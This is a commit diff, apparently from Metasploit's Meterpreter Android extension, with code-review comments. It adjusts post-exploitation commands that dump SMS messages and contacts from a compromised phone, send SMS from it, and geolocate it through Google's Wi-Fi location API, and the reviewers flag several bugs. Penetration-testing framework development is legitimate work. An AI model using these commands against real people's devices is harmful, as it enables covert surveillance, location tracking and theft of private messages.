bug fixes
parent
761caa0a60
commit
31dcae6828
|
@ -18,15 +18,14 @@ module Rex
|
|||
attr_accessor :longitude
|
||||
|
||||
def initialize
|
||||
@uri = URI.parse(GOOGLE_API_URI)
|
||||
@uri = URI.parse(URI.encode(GOOGLE_API_URI))
|
||||
@wlan_list = []
|
||||
end
|
||||
|
||||
# Ask Google's Maps API for the location of a given set of BSSIDs (MAC
|
||||
# addresses of access points), ESSIDs (AP names), and signal strengths.
|
||||
def fetch!
|
||||
@uri.query << @wlan_list.join("&")
|
||||
|
||||
@uri.query << @wlan_list.join("&wifi=")
|
||||
request = Net::HTTP::Get.new(@uri.request_uri)
|
||||
http = Net::HTTP::new(@uri.host,@uri.port)
|
||||
http.use_ssl = true
|
||||
|
@ -52,7 +51,7 @@ module Rex
|
|||
# @param ssid [String] ESSID associated with the mac
|
||||
# @param signal_strength [String] a thing like
|
||||
def add_wlan(mac, ssid = nil, signal_strength = nil)
|
||||
@wlan_list.push("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")
|
||||
@wlan_list.push(URI.encode("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}"))
|
||||
end
|
||||
|
||||
def google_maps_url
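Review bot: `URI.encode` in add_wlan leaves `&` and `=` unescaped, so an SSID containing either one changes the query string that fetch! builds; SSIDs are chosen by whoever operates the access point and should be treated as untrusted input. Encoding each entry with `URI.encode_www_form_component("mac:#{mac.upcase}|ssid:#{ssid}|ss=#{signal_strength.to_i}")` before pushing it closes that gap and also moves off `URI.encode`, which is obsolete and was removed in Ruby 3.0. Separately, `@uri.query << @wlan_list.join("&wifi=")` appends in place, so a second call to fetch! on the same object would append the list again, and the first entry gets no `&wifi=` prefix unless GOOGLE_API_URI (not visible here) already ends with one. fetch! continues past the end of the hunk.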
|
||||
|
|
|
@ -44,7 +44,7 @@ class Android < Extension
|
|||
def dump_sms
|
||||
sms = Array.new
|
||||
request = Packet.create_request('dump_sms')
|
||||
response = client.send_request(request)
|
||||
response = client.send_request(request,60)
|
||||
|
||||
response.each( TLV_TYPE_SMS_GROUP ) { |p|
|
||||
|
||||
|
@ -64,7 +64,7 @@ class Android < Extension
|
|||
def dump_contacts
|
||||
contacts = Array.new
|
||||
request = Packet.create_request('dump_contacts')
|
||||
response = client.send_request(request)
|
||||
response = client.send_request(request,60)
|
||||
|
||||
response.each( TLV_TYPE_CONTACT_GROUP ) { |p|
|
||||
|
||||
|
@ -120,18 +120,26 @@ class Android < Extension
|
|||
response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value
|
||||
end
|
||||
|
||||
def send_sms(dest,body)
|
||||
def send_sms(dest,body,dr)
|
||||
request = Packet.create_request('send_sms')
|
||||
request.add_tlv(TLV_TYPE_SMS_ADDRESS,dest)
|
||||
request.add_tlv(TLV_TYPE_SMS_BODY,body)
|
||||
response = client.send_request(request)
|
||||
resp=response.get_tlv(TLV_TYPE_SMS_SENT).value
|
||||
return resp
|
||||
request.add_tlv(TLV_TYPE_SMS_DR,dr)
|
||||
if dr == false
|
||||
response=client.send_request(request)
|
||||
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
return sr
|
||||
else
|
||||
response=client.send_request(request,30)
|
||||
sr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
dr=response.get_tlv(TLV_TYPE_SMS_SR).value
|
||||
return [sr,dr]
|
||||
end
|
||||
end
|
||||
|
||||
def wlan_geolocate
|
||||
request = Packet.create_request('wlan_geolocate')
|
||||
response = client.send_request(request,45)
|
||||
response = client.send_request(request,60)
|
||||
networks=[]
|
||||
response.each( TLV_TYPE_WLAN_GROUP ) { |p|
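Review bot: In the delivery-report branch of send_sms, `dr=response.get_tlv(TLV_TYPE_SMS_SR).value` reads the same TLV as `sr` on the line before, so the returned pair always holds the send status twice and the caller's "SMS delivered" message cannot reflect a real delivery report. It needs its own response TLV; the constants touched in this commit define TLV_TYPE_SMS_DR only as a BOOL, which is used here as the request flag. The new third parameter also has no default, so any existing caller of `send_sms(dest, body)` would raise ArgumentError; `def send_sms(dest, body, dr = false)` keeps them working. Each `get_tlv(...).value` would also raise NoMethodError when the reply lacks that TLV, assuming get_tlv returns nil in that case.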
|
||||
|
||||
|
|
|
@ -33,12 +33,14 @@ TLV_TYPE_CHECK_ROOT_BOOL = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9019)
|
|||
|
||||
TLV_TYPE_SHUTDOWN_TIMER = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9020)
|
||||
|
||||
TLV_TYPE_SMS_SENT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9021)
|
||||
TLV_TYPE_SMS_SR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9021)
|
||||
|
||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||
TLV_TYPE_WLAN_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9022)
|
||||
TLV_TYPE_WLAN_BSSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9023)
|
||||
TLV_TYPE_WLAN_SSID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9024)
|
||||
TLV_TYPE_WLAN_LEVEL = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9025)
|
||||
|
||||
TLV_TYPE_SMS_DR = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9026)
|
||||
|
||||
end
|
||||
end
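Review bot: TLV_TYPE_SMS_SR takes over index 9021 from TLV_TYPE_SMS_SENT but with TLV_META_TYPE_STRING instead of TLV_META_TYPE_BOOL, so the combined type value is different from the one it replaces. A payload built before this change would presumably still answer with the BOOL form, which a lookup by TLV_TYPE_SMS_SR would not match. Consider giving the string status a fresh index and leaving 9021 as it was, or at least add a comment on the constant such as `# replaces TLV_TYPE_SMS_SENT (BOOL); requires a payload built with this change`.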
|
||||
|
|
|
@ -1,6 +1,7 @@
|
|||
# -*- coding: binary -*-
|
||||
require 'rex/post/meterpreter'
|
||||
require 'msf/core/auxiliary/report'
|
||||
require 'rex/google_geolocation'
|
||||
|
||||
module Rex
|
||||
module Post
|
||||
|
@ -377,10 +378,12 @@ class Console::CommandDispatcher::Android
|
|||
send_sms_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [ false, 'Help Banner' ],
|
||||
'-d' => [ true, 'Destination number' ],
|
||||
'-t' => [ true, 'SMS body text' ]
|
||||
'-t' => [ true, 'SMS body text' ],
|
||||
'-dr' => [ false, 'Wait for delivery report' ]
|
||||
)
|
||||
dest=''
|
||||
body=''
|
||||
dr=false
|
||||
send_sms_opts.parse(args) { | opt, idx, val |
|
||||
case opt
|
||||
when '-h'
|
||||
|
@ -392,6 +395,8 @@ class Console::CommandDispatcher::Android
|
|||
dest=val
|
||||
when '-t'
|
||||
body=val
|
||||
when '-dr'
|
||||
dr=true
|
||||
end
|
||||
}
|
||||
if (dest.blank? or body.blank?)
|
||||
|
@ -400,11 +405,25 @@ class Console::CommandDispatcher::Android
|
|||
print_line(send_sms_opts.usage)
|
||||
return
|
||||
end
|
||||
sent=client.android.send_sms(dest,body)
|
||||
if (sent)
|
||||
print_good('SMS sent')
|
||||
|
||||
sent=client.android.send_sms(dest,body,dr)
|
||||
if (dr)
|
||||
if (sent[0]=="Transmission successful")
|
||||
print_good("SMS sent - #{sent[0]}")
|
||||
else
|
||||
print_error("SMS send failed - #{sent[0]}")
|
||||
end
|
||||
if (sent[1]=="Transmission successful")
|
||||
print_good("SMS delivered - #{sent[1]}")
|
||||
else
|
||||
print_error("SMS delivery failed - #{sent[1]}")
|
||||
end
|
||||
else
|
||||
print_status('SMS failed to send')
|
||||
if (sent=="Transmission successful")
|
||||
print_good("SMS sent - #{sent}")
|
||||
else
|
||||
print_error("SMS send failed - #{sent}")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -422,42 +441,36 @@ class Console::CommandDispatcher::Android
|
|||
print_line(wlan_geolocate_opts.usage)
|
||||
return
|
||||
end
|
||||
|
||||
print_status('Waiting for WiFi scan results...')
|
||||
}
|
||||
|
||||
log = client.android.wlan_geolocate
|
||||
wlan_list=''
|
||||
wlan_list=[]
|
||||
wlan_str=""
|
||||
log.each{|x|
|
||||
mac=x['bssid']
|
||||
ssid=x['ssid']
|
||||
ss=x['level']
|
||||
network_data = "&wifi=mac:#{mac}|ssid:#{ssid}|ss=#{ss}"
|
||||
wlan_list << network_data
|
||||
wlan_list << [mac,ssid,ss.to_s]
|
||||
}
|
||||
|
||||
if wlan_list.blank?
|
||||
print_error("Unable to enumerate wireless networks from the target. Wireless may not be present or enabled.")
|
||||
return
|
||||
end
|
||||
g = Rex::GoogleGeolocation.new
|
||||
|
||||
# Build and send the request to Google
|
||||
url = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true#{wlan_list}"
|
||||
uri = URI.parse(URI.encode(url))
|
||||
request = Net::HTTP::Get.new(uri.request_uri)
|
||||
http = Net::HTTP::new(uri.host,uri.port)
|
||||
http.use_ssl = true
|
||||
response = http.request(request)
|
||||
|
||||
# Gather the required information from the response
|
||||
if response && response.code == '200'
|
||||
results = JSON.parse(response.body)
|
||||
latitude = results["location"]["lat"]
|
||||
longitude = results["location"]["lng"]
|
||||
accuracy = results["accuracy"]
|
||||
print_status("Google indicates that the target is within #{accuracy} meters of #{latitude},#{longitude}.")
|
||||
print_status("Google Maps URL: https://maps.google.com/?q=#{latitude},#{longitude}")
|
||||
else
|
||||
print_error("Failure connecting to Google for location lookup.")
|
||||
wlan_list.each do |wlan|
|
||||
g.add_wlan(*wlan)
|
||||
end
|
||||
begin
|
||||
g.fetch!
|
||||
rescue RuntimeError => e
|
||||
print_error("Error: #{e}")
|
||||
else
|
||||
print_status(g.to_s)
|
||||
print_status("Google Maps URL: #{g.google_maps_url}")
|
||||
end
|
||||
|
||||
|
||||
end
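Review bot: `rescue RuntimeError => e` around `g.fetch!` catches only RuntimeError and its subclasses, so connection-level failures of the HTTPS request that fetch! makes (for example SocketError, Errno::ECONNREFUSED or OpenSSL::SSL::SSLError) would propagate out of the command instead of printing an error. The same applies to JSON::ParserError if fetch! parses the response body. `rescue ::StandardError => e` would cover these, or fetch! could translate them into the error it already raises. Only the first lines of fetch! are visible in this commit, so confirm which exceptions it can actually raise.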
|
||||
|
||||
|
|